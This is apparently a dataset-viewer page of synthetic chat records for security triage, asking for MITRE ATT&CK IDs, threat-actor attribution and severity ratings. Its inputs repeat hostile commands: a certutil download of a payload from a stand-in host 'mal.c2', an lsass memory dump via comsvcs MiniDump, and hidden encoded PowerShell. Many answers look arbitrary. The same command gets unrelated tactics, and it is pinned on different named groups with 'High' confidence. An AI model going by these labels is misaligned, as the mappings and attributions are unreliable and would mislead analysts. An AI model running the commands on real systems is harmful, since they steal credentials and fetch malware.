messages listlengths 2 2 |
|---|
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.152.37.27",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA0... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Pand... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 835 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.84.210.169",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0001\", \"TA0004\"], \"techn... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.192.181.136",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0003\"], \"technique... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-52RVVYZCCX)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Command and Control",
"role": "user"
},
{
"content": "{\"severity\": \... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-2DX6GVF0Q1)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Exfiltration",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3650 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.135.237.76",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA0001\"]... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3399 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.125.32.186",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.17.23.63",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techn... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-9X9BFBAYK2)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severity\":... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Kessel can use a proxy during exfiltration if set in the configuration.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1090\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-AETMPW3KMA)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence, Command and Control",
"role": "user"
},
{
"content": "{\"sev... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"technique... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered S... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-Z7E1DQO7M6)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\": \"Hi... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may use new payloads to execute this technique.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\", \"TA0005\"], \"techniques\": [\"T1574.006\", \"T1574\"]}",
"role": ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3606 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", \"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-BCYNMMX37Y)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Defense Evasion, Execution",
"role": "user"
},
{
"content": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-069MDHHATX)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Credential Access, Command and Control, Impact",
"role": "user"
},
{
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 547 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.143.132.183",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\"], \"techniques\": [\"T1484... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", \"con... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: VPN and to persist in same sentence",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0003\"], \"techniques\": [\"T1133\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spid... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: APT1 has collected files from a local victim.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1005\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"co... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-LO8GOF6V7F)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Command and Control",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-815M74BOBE)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severity\":... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.160.158.242",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-JZO5HQQBEQ)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Lateral Movement, Persistence",
"role": "user"
},
{
"content": "{\"seve... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: BabyShark has executed the reg query command for HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1012\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other mo... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.74.161.109",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: SharpStage has decompressed data received from the C2 server.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-89M7DLF6QQ)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Credential Access, Execution, Reconnaissance",
"role": "user"
},
{
"co... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts.",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1910 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"c... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: They are consistent and serve as stable IoC: %system32%driverswinntd_.dat %system32%driverswinntd.dat %system32%driverswincache.dat %system32%driversmlang.dat %system32%driversosver32nt.dat %LOCALAPPDATA%adobewind002.dat %... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.48.79.253",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"c... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.66.179.153",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T100... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Mustang Panda has used names like adobeupdate.dat and PotPlayerDB.dat to disguise PlugX, and a file named OneDrive.exe to load a Cobalt Strike payload.",
"role": "user"
},
{
"content": "{\"tactics\": [\"T... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-4YPMFAAI8D)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion",
"role": "user"
},
{
"content": "{\"severity\": \"C... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.5.133.206",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techni... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2208 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.163.40.72",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA0040\"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: GrimAgent has the ability to enumerate files and directories on a compromised host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}",
"role": "assistant"
}... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.40.7.61",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0010\", \"TA0043\"], \"te... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: C:\\Windows\\System32\\sethc.exe",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.008\", \"T1546\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.76.137.60",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0006\"], \"techniques\": ... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3266 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.147.233.105",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0006\"], \"techniques\": [\... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"],... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2379 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidenc... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for unusual processes with internal network connections creating files on-system may be suspicious",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1570\"]}",
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1030 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"conf... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2041 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidenc... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2429 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.21.81.115",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"]... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Sidewinder has used tools to identify running processes on the victim's machine.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidenc... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Doki was run through a deployed container.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0005\"], \"techniques\": [\"T1610\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidence\":... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\": \"High\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-2QL45K34W4)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence, Discovery, Reconnaissance",
"role": "user"
},
{
"content": "... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Binaries that have these bits set may then be abused by adversaries.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1548\", \"T1548.001\"]}",
"role": "as... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2611 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidenc... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Ensure updated virus definitions and create custom signatures for observed malware.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027.002\", \"T1027\"]}",
"role": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-YBPD8GK876)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Lateral Movement",
"role": "user"
},
{
"con... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3429 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidenc... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-FJ3EFCT3JH)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Impact",
"role": "user"
},
{
"content": "{\"severi... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoo... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1417 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\",... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: For the print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the GetPrintProcessorDirectory API call.",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1009 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.116.241.23",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0002\", \"TA0043\"], \"tech... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1220\"]}",
"role": "assi... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-RDLOWODBK3)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Credential Access",
"role": "user"
},
{
"content": "{\"severity\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3287 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, LOLBin, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confid... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1402 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Fileless, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"c... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: NDiskMonitor uses AES to encrypt certain information sent over its C2 channel.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}",
"role": "assistant"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confi... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.39.253.12",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Detection efforts may be focused on related behaviors, such as Web Protocols, Asymmetric Cryptography, and/or Install Root Certificate.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"tech... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1749 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.25.234.210",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0040\"]... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Figure 2: De-obfuscated code scheduling the second task to run a script embedded in a blog page The last section of script embedded in 29[.]html then downloads Revenge RAT and injects the binary into the memory of a ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-TIJV15QBR7)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Collection, Persistence",
"role": "user"
},
{
"content": "{\"se... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.59.38.94",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T15... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Some Felismus samples use a custom encryption method for C2 traffic that utilizes AES and multiple keys.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.0... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.106.100.45",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0008\"], \"techniques\": [\"T1071.00... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-Q56RVBDSL8)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Command and Control",
"role": "user"
},
{
... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.69.220.85",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.174.62.241",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"t... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: C:\\Windows\\System32\\utilman.exe",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.008\", \"T1546\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Zeus Panda can launch an interface where it can execute several commands on the victim’s PC.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}",
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-RRPK6F0IZK)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Execution, Reconnaissance",
"role": "user"
},
{
"cont... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA000... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1018 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"c... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Different methods of blocking may cause different disruptions in reporting.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1562.006\", \"T1562\"]}",
"role": "assistant"
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\": \"High\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-JIC0X6H2HT)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Discovery, Credential Access, Execution",
"role": "user"
},
{
... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: StreamEx has the ability to enumerate drive types.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}",
"role": "assistant"
}
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.